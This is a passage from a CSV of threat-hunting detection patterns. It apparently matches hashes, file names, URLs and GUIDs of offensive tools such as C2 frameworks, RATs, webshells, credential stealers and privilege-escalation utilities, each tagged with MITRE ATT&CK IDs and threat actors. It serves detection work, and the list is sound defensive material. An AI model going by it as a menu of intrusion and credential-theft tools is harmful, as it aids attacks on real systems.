bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","40469" 
"*ddbf3299675ffdd7e3475f8a4848f3ab6cdff8819348c75b9ac4d8fb76569a2c*",".{0,1000}ddbf3299675ffdd7e3475f8a4848f3ab6cdff8819348c75b9ac4d8fb76569a2c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40470" "*ddcc3057b5c499e1e90d914d9da185d5860f0e9f44a3e5b8f5c9396eaa216ce0*",".{0,1000}ddcc3057b5c499e1e90d914d9da185d5860f0e9f44a3e5b8f5c9396eaa216ce0.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","40473" "*ddcde0386174b43753d3f5f8e2e301ccfd8ef5a4dd60bb71c1005b6440072696*",".{0,1000}ddcde0386174b43753d3f5f8e2e301ccfd8ef5a4dd60bb71c1005b6440072696.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40474" 
"*ddd36cf834fc7dca78f2d96e954e0949043c1c63aa268cfc18774e9875e63192*",".{0,1000}ddd36cf834fc7dca78f2d96e954e0949043c1c63aa268cfc18774e9875e63192.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40476" "*ddda511b0021b986442e74225967da027387842aeb9b88cd2ed51cfea1ff0758*",".{0,1000}ddda511b0021b986442e74225967da027387842aeb9b88cd2ed51cfea1ff0758.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40477" "*ddde81ecf809882929faefd5887095a9d8671979f0c4d68579fa8b3a07674768*",".{0,1000}ddde81ecf809882929faefd5887095a9d8671979f0c4d68579fa8b3a07674768.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","#filehash","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","40478" 
"*dde0f307acb5f8701be9bd6ecefa316952a96f3629e04fa8f519865752d78691*",".{0,1000}dde0f307acb5f8701be9bd6ecefa316952a96f3629e04fa8f519865752d78691.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","40479" "*dde8e9815b11bced6601b6c0b11235c1c3e6d7ab3196634db85566699bf9e1e6*",".{0,1000}dde8e9815b11bced6601b6c0b11235c1c3e6d7ab3196634db85566699bf9e1e6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40480" "*ddeeedc8ab9ab3b90c2e36340d4674fda3b458c0afd7514735b2857f26b14c6d*",".{0,1000}ddeeedc8ab9ab3b90c2e36340d4674fda3b458c0afd7514735b2857f26b14c6d.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","0","#filehash","N/A","7","9","N/A","N/A","N/A","N/A","40481" "*ddeeedc8ab9ab3b90c2e36340d4674fda3b458c0afd7514735b2857f26b14c6d*",".{0,1000}ddeeedc8ab9ab3b90c2e36340d4674fda3b458c0afd7514735b2857f26b14c6d.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. 
","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","0","#filehash","N/A","7","9","N/A","N/A","N/A","N/A","40482" "*ddf0d053a9ee7c4f7d1b1965a976ddfb3792c7703ff81fafb9a3758a45c86f9c*",".{0,1000}ddf0d053a9ee7c4f7d1b1965a976ddfb3792c7703ff81fafb9a3758a45c86f9c.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","40483" "*ddf4573b4c5fdfd92657979d79b8d8c7658dbb36e9a794628438ff01d7cca1a5*",".{0,1000}ddf4573b4c5fdfd92657979d79b8d8c7658dbb36e9a794628438ff01d7cca1a5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40484" "*ddf4c4af21b0ee3759fcf48f9adbd06f818c8f3058470e5861f760e629992400*",".{0,1000}ddf4c4af21b0ee3759fcf48f9adbd06f818c8f3058470e5861f760e629992400.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40485" "*DDOSHTTPFLOOD*",".{0,1000}DDOSHTTPFLOOD.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - 
TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","40489" "*DDOSSYNFLOOD*",".{0,1000}DDOSSYNFLOOD.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","40490" "*DDOSUDPFLOOD*",".{0,1000}DDOSUDPFLOOD.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","40491" "*ddspoof*--enum-name-protection*",".{0,1000}ddspoof.{0,1000}\-\-enum\-name\-protection.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","40492" "*ddspoof.py -*",".{0,1000}ddspoof\.py\s\-.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 
- T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","40493" "*DDSpoof\spoofer_config.py*",".{0,1000}DDSpoof\\spoofer_config\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","40494" "*DDSpoof-main*",".{0,1000}DDSpoof\-main.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","40495" "*de.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}de\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","40496" "*de0565be5697d5543b8abb888a6d3d94d7cfb2538500b74ee38010f54f96a96a*",".{0,1000}de0565be5697d5543b8abb888a6d3d94d7cfb2538500b74ee38010f54f96a96a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon 
Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40499" "*de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03*",".{0,1000}de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","40500" "*de0be23b564e470725a91e72bf431667ab1d2d4e8cb318a1c18e66b3ba97340e*",".{0,1000}de0be23b564e470725a91e72bf431667ab1d2d4e8cb318a1c18e66b3ba97340e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40501" "*de25283c258cc462a919df98ff3033b6f433cf0ab4d92e95a650099839c45e63*",".{0,1000}de25283c258cc462a919df98ff3033b6f433cf0ab4d92e95a650099839c45e63.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#filehash","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","40503" "*de314bd66c919dbd7b5e6614583f44a6461a1663f880873bc6746eed3a149457*",".{0,1000}de314bd66c919dbd7b5e6614583f44a6461a1663f880873bc6746eed3a149457.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord 
Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40504" "*de3a20c75f66c663508436a2a3d049987158976535bb5e5eaa63823dbf6d7e3f*",".{0,1000}de3a20c75f66c663508436a2a3d049987158976535bb5e5eaa63823dbf6d7e3f.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40506" "*de3abde117d7eacbb638bc7d0151f929cf80a4bb5e5beb1e390839e96fc6722a*",".{0,1000}de3abde117d7eacbb638bc7d0151f929cf80a4bb5e5beb1e390839e96fc6722a.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","40507" "*de49e60f2eb443316fa7585f6621fa83a9a3bb5b701649e05117ff4012379c89*",".{0,1000}de49e60f2eb443316fa7585f6621fa83a9a3bb5b701649e05117ff4012379c89.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40510" 
"*de4efb508d6f89e6d638f4def3b014b2d6c5703baa5026e03990b7bccb0beab4*",".{0,1000}de4efb508d6f89e6d638f4def3b014b2d6c5703baa5026e03990b7bccb0beab4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40512" "*de53e80411d94b39ea18d9f98cbb1bd6dc07ac2ab732753dec649fef458f3aad*",".{0,1000}de53e80411d94b39ea18d9f98cbb1bd6dc07ac2ab732753dec649fef458f3aad.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40513" "*de569a85963dfe8966a51f5e5fdd9ecc9cbc30721fc2d624c4c29c6cf6d12adf*",".{0,1000}de569a85963dfe8966a51f5e5fdd9ecc9cbc30721fc2d624c4c29c6cf6d12adf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","40514" "*de644386f998ffc10be5abafb2d6fc00ea44932ae1d85e353a36faf77892e967*",".{0,1000}de644386f998ffc10be5abafb2d6fc00ea44932ae1d85e353a36faf77892e967.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40517" "*de6ab219ec55af3fa4cb74c1342e3c22f1dccd8d465df96110511fc426109372*",".{0,1000}de6ab219ec55af3fa4cb74c1342e3c22f1dccd8d465df96110511fc426109372.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40518" "*de74cc01088879ddf3f7c392345e9229490e06f0cc03c52102b0e94b79c01cfc*",".{0,1000}de74cc01088879ddf3f7c392345e9229490e06f0cc03c52102b0e94b79c01cfc.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","40519" "*DE7B9E6B-F73B-4573-A4C7-D314B528CFCB*",".{0,1000}DE7B9E6B\-F73B\-4573\-A4C7\-D314B528CFCB.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","#GUIDproject","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","40521" "*de81859bc3a1de8e35c2fa363f2405d7aff32f674cc3757caa1cc89235ec818e*",".{0,1000}de81859bc3a1de8e35c2fa363f2405d7aff32f674cc3757caa1cc89235ec818e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40523" "*de91f6c22eb6c8cc6da344665a046253392151bab78bf27196fec5d6d3f55b29*",".{0,1000}de91f6c22eb6c8cc6da344665a046253392151bab78bf27196fec5d6d3f55b29.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","40524" "*de961474a71ea2f05fd9e9d6b862397660ed559533534bffa03cf9f2f2b70dab*",".{0,1000}de961474a71ea2f05fd9e9d6b862397660ed559533534bffa03cf9f2f2b70dab.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40525" "*dea9d52d974dbe0c3598b7f75f07f6e1ef6eb835195938188942f49f9034a432*",".{0,1000}dea9d52d974dbe0c3598b7f75f07f6e1ef6eb835195938188942f49f9034a432.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 
SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#filehash","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","40529" "*deadpotato.exe*",".{0,1000}deadpotato\.exe.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","40530" "*DeadPotato-NET4.exe*",".{0,1000}DeadPotato\-NET4\.exe.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","40531" "*Deanlivermore@protonmail.com*",".{0,1000}Deanlivermore\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40532" "*deb http://old.kali.org/kali sana main non-free contrib*",".{0,1000}deb\shttp\:\/\/old\.kali\.org\/kali\ssana\smain\snon\-free\scontrib.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","40533" "*deb.torproject.org/torproject.org/*",".{0,1000}deb\.torproject\.org\/torproject\.org\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","40534" "*deb.torproject.org/torproject.org/*.asc*",".{0,1000}deb\.torproject\.org\/torproject\.org\/.{0,1000}\.asc.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40535" "*deb.torproject.org-keyring*",".{0,1000}deb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","40536" "*debd82bfe5eaf80dfb9d254962df14431f231cde2c09b8efeeed73e4f263cd98*",".{0,1000}debd82bfe5eaf80dfb9d254962df14431f231cde2c09b8efeeed73e4f263cd98.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","40538" "*debf430fa413aa09fcb067ba67e7a9813dc06b5f16ab32fab9686bee1f5639da*",".{0,1000}debf430fa413aa09fcb067ba67e7a9813dc06b5f16ab32fab9686bee1f5639da.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40540" "*debian.org/pkg-security-team/creddump7*",".{0,1000}debian\.org\/pkg\-security\-team\/creddump7.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms 
of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","40541" "*debian-tor:x*",".{0,1000}debian\-tor\:x.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","40542" "*DebugAmsi.exe*",".{0,1000}DebugAmsi\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass 